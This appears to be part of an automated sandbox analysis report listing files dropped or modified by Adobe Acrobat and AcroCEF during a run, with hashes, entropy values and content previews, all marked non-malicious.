                                                                                                        SHA-256:C5DB5CCE54298A04D7F33DD6813EBBFB9D7C97C5256691A75C291FA2BE9D98E8
                                                                                                        SHA-512:93B2739B318E492D66763712D753D8E51ACA2B1A7B75EC4F809E6FD2C786DB03D7C8C1C5764DCF9E3998DF0E70F71DAFD5A95CFD949167A6597595588A28B70D
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2024/10/04-09:11:11.446 2e8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/04-09:11:11.450 2e8 Recovering log #3.2024/10/04-09:11:11.451 2e8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):403
                                                                                                        Entropy (8bit):4.953858338552356
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                        MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                        SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                        SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                        SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:modified
                                                                                                        Size (bytes):403
                                                                                                        Entropy (8bit):4.990840155196377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YHO8sqy2sBdOg2H5Acaq3QYiubrP7E4T3y:YXsVbdMHZ3QYhbz7nby
                                                                                                        MD5:24F5430BE8C1AF91B8940F0F557E710B
                                                                                                        SHA1:28842DBB992A3C29DAA4E8CCD9A6D5B26A3B6D7A
                                                                                                        SHA-256:F81CB6274DF5A9EC10C9994C4FEE8A25AFFDF1DE1F4097858F4C30211015BC17
                                                                                                        SHA-512:32A74CF7E2BE88BED38C654B02724BE7DE69E7BE37D928479A16672D1D5CAC816AEFEF5C712E430FA6AD2D5EB2B162A16E3A186EAC89B5A5230B24B329F4E0EC
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372607483165267","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":129031},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):403
                                                                                                        Entropy (8bit):4.953858338552356
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                        MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                        SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                        SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                        SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):403
                                                                                                        Entropy (8bit):4.953858338552356
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                        MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                        SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                        SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                        SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4099
                                                                                                        Entropy (8bit):5.228090890452306
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xeFX6xt9:OLT0bTIeYa51Ogu/0OZARBT8kN88t6xn
                                                                                                        MD5:7DA7F439CD45C1AB46F35762C547CB7F
                                                                                                        SHA1:23E7B89DA8FFC488734CDF7BCC143AB99108B386
                                                                                                        SHA-256:FC79D6857CFDF090AEF6109BB44734ACB2D852DD42355D97C689FF9CA833D9F1
                                                                                                        SHA-512:AB358FE6BC5011A39EB00823AB6556617A33C8319E48701EFA5873471D7B7C3F873B7E8BF1040763BCD75C64F0EB00FA31C86FD6AFD91B6A2334D0B9CD0CE797
                                                                                                        Malicious:false
                                                                                                        Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):319
                                                                                                        Entropy (8bit):5.172217655164052
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:QXgN9+q2PRN2nKuAl9OmbzNMxIFUt8HXnXZmw+HX9UVkwORN2nKuAl9OmbzNMFLJ:QXgOvaHAa8jFUt8HXnX/+HXC5JHAa84J
                                                                                                        MD5:EE75FD422B28D93334732E3A205A1C03
                                                                                                        SHA1:7B268F7C118C4DB3A1F44311482E5E154D6DB3BD
                                                                                                        SHA-256:0C36E3897D3B03E382310C1C14CC7B8E8DCA1AB639579DED51174844546A1A8E
                                                                                                        SHA-512:EEF975880147727515B3E4FB0380751D923BD3849A1B5EC850BF05A2B8208E608FA653A4F33C16DA152D849F17E1F013BB18B21B6CA100A7D96631F75D407B95
                                                                                                        Malicious:false
                                                                                                        Preview:2024/10/04-09:11:11.561 2e8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/04-09:11:11.566 2e8 Recovering log #3.2024/10/04-09:11:11.570 2e8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):319
                                                                                                        Entropy (8bit):5.172217655164052
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:QXgN9+q2PRN2nKuAl9OmbzNMxIFUt8HXnXZmw+HX9UVkwORN2nKuAl9OmbzNMFLJ:QXgOvaHAa8jFUt8HXnX/+HXC5JHAa84J
                                                                                                        MD5:EE75FD422B28D93334732E3A205A1C03
                                                                                                        SHA1:7B268F7C118C4DB3A1F44311482E5E154D6DB3BD
                                                                                                        SHA-256:0C36E3897D3B03E382310C1C14CC7B8E8DCA1AB639579DED51174844546A1A8E
                                                                                                        SHA-512:EEF975880147727515B3E4FB0380751D923BD3849A1B5EC850BF05A2B8208E608FA653A4F33C16DA152D849F17E1F013BB18B21B6CA100A7D96631F75D407B95
                                                                                                        Malicious:false
                                                                                                        Preview:2024/10/04-09:11:11.561 2e8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/04-09:11:11.566 2e8 Recovering log #3.2024/10/04-09:11:11.570 2e8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                        Category:dropped
                                                                                                        Size (bytes):71190
                                                                                                        Entropy (8bit):2.0554894375032973
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:gA7u4oFP0mueuywwIR2HM/0gWQSh0GTEYudD:/dyIcTY5
                                                                                                        MD5:5B3B884ABA09E1B3E434F8FA7C60D24B
                                                                                                        SHA1:915A897042D905166CADAF51FA9828B31548920D
                                                                                                        SHA-256:91BD693E3E50A8F43D75BEF311E1EA748066B526CD4934BAF7D9790F873EA5E8
                                                                                                        SHA-512:E26640649B6EF44EC6C1AC42B4086E295085E35C592B94CED32039A3A2F96AC31A3361C91C4170473047240537E235F04E077AF147C5F214D7339DE53A6ED936
                                                                                                        Malicious:false
                                                                                                        Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                        Category:dropped
                                                                                                        Size (bytes):57344
                                                                                                        Entropy (8bit):3.291927920232006
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                                                                        MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                                                                        SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                                                                        SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                                                                        SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16928
                                                                                                        Entropy (8bit):1.2146104124040076
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:7+t47qLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzm+ZL:7M8qLmFTIF3XmHjBoGGR+jMz+Lhe
                                                                                                        MD5:9B509E628F688C45D80745AE4739D6EC
                                                                                                        SHA1:CE810280C2FD7BC826852FD80C1E0DD6EDBF15FA
                                                                                                        SHA-256:E8B648C0F86BE5ED70548A096B3300F4D488AB63EB9915DAA1E865B60FFC754B
                                                                                                        SHA-512:2B2260DC1B8A8316EE553B72A3F2087F1E2CB4C9F15089E17CF06EF2B901EB25C10FD295C39FBD6E1A1B524D72725FBB671356A7A15A69E70F104D0D15662C33
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c......._.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Certificate, Version=3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1391
                                                                                                        Entropy (8bit):7.705940075877404
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                        Malicious:false
                                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                        Category:dropped
                                                                                                        Size (bytes):71954
                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                        Malicious:false
                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):2.756901573172974
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:kkFkl54MLNl1fllXlE/HT8kz/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKzo32T8o7NMa8RdWBwRd
                                                                                                        MD5:B1338809DD45A241ADD63307444EF07E
                                                                                                        SHA1:7881C35C49B50AB91391B3A5AB0BC5F00DEBBCC9
                                                                                                        SHA-256:808B742331A83D990EAF61586EADFE7A686E6E091B667D9AFF70BA76DA6B4D05
                                                                                                        SHA-512:21FB35D40AE98F743A3E1C168FF6BFC26B6BF4C06BBDE78D58A4DB102CED50087EDBAD323ADAAA27CB65BE9302FEF5F5B4A2C039EAA51A7C46EAC095FD736A0A
                                                                                                        Malicious:false
                                                                                                        Preview:p...... ..........A.^...(....................................................... ..........W....s...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):328
                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kKNn9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:0DnLNkPlE99SNxAhUe/3
                                                                                                        MD5:ED3B4D8DBF3C5576D5CC2AD754C3F691
                                                                                                        SHA1:EBF91FDA6528B5C846E1B1EFDC2C62A244A054E1
                                                                                                        SHA-256:61178A287AEF2E6367FE058B9FC97550AE22822B88A81F5E2D939518BD7BF8AB
                                                                                                        SHA-512:A3505B969C71F2CD6C5FC6B3766B9DA2AC7FEE56B7B6B500B2F54B3C0D31E91C8C90042A3C36B8A7015708945369AE1C2F8CE7154FBBE56889B7C7E3D5589030
                                                                                                        Malicious:false
                                                                                                        Preview:p...... ...........^...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):185099
                                                                                                        Entropy (8bit):5.182478651346149
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                                        MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                                        SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                                        SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                                        SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):185099
                                                                                                        Entropy (8bit):5.182478651346149
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                                                        MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                                                        SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                                                        SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                                                        SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:e:e
                                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                        Malicious:false
                                                                                                        Preview:....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2145
                                                                                                        Entropy (8bit):5.082736666702322
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:YTAiESAuYCjWbj2CjxjZ4oijxi+0jPjrVbjBgajF:EDWP2ERaTx3y7BPBgMF
                                                                                                        MD5:44D603ED1B3DB666D9D47090EB33DEE9
                                                                                                        SHA1:8C3C9E053FBB8445D432249B0E83763F780AD363
                                                                                                        SHA-256:A81013D2CECE2312331DCD35A6E1A36D4765350C82C6CE20366F182912A28B27
                                                                                                        SHA-512:6DCDF61A4E789B0C1F1213CAD1CDA126270DB79DA636B416671AE440B8B4855CC475FC479759D994BAE521E1E9428A04688B12788A5C68602FC11CD954E08C69
                                                                                                        Malicious:false
                                                                                                        Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1728047474000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"f44756c6e08822e64c0e471a2499e34d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696585148000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e8f53b6740aba22a83a1a569cebedbcc","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696585148000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"cc1faa6a0c714f2f0c497731f1772fa2","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696585143000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ab062dea95f25ef019cc2f5f5f0121d4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696583346000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"65580efad4bc88b91040ff50d71bfae9","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696583346000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12288
                                                                                                        Entropy (8bit):0.9889439422106067
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QehIcLESiAieZF:TVl2GL7ms67YXtracI8f
                                                                                                        MD5:ED4DE2CE56B8F4AD2D2BF079FFA06299
                                                                                                        SHA1:AC0E73303B8A22E9542F75AEF768035446207A5D
                                                                                                        SHA-256:0404FE4829A78C8BAB4944E9951B527D49B9A5B6EB2CFBA0EE7B03EE6518B8B3
                                                                                                        SHA-512:B50BA506523B4FDEEE03606E7E508542E2D56915C36337B02D9A8A3CF1CC05E8512FE5D2872F1F17B56B23DAE36D7FF7A87CEA87BFB93C019778C5CA60285FC2
                                                                                                        Malicious:false
